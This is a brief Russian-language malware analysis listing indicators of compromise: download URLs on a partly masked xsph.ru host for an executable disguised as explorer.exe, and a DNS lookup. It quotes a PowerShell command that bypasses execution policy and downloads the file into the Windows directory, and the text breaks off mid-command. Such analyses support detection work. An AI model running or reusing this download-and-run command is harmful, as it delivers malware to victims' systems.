Техническая информация
- http://f0####64.xsph.ru/download/гґxplorгґr.exe как %windir%\гґxplorгґr.exe
- http://f0####64.xsph.ru/download/%C3%A5xplor%C3%A5r.exe
- DNS ASK f0####64.xsph.ru
- '%WINDIR%\syswow64\cmd.exe' /c start powershell.exe -exec bypass -windo 1 -noexit -command iex(New-Object System.Net.WebClient).DownloadFile('http://f0####64.xsph.ru/download/ГҐxplorГҐr.exe','%WINDIR%\ГҐxplorГҐr.exe');Sta...